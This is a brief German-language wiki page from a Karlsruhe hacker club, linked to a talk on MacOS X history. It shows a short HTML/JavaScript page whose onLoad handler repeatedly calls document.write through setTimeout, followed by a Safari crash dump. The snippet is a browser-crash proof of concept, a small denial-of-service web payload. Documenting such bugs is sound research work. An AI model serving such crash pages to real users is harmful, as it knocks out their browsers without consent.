GPN5:Die Geschichte von MacOS X/Safari Crash

aus dem Wiki des Entropia e.V., CCC Karlsruhe
 <html>
 <script name="JavaScript">
 function KnockOut(){
   setTimeout("KnockOut()", 1000);
   thisTime = new Date()
   seconds = thisTime.getSeconds()
   document.write(seconds);
 }
 </script>
 <body onLoad="KnockOut();">
 </html>


Crasht Safari mit diesen Core Dump:
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0xbf806fec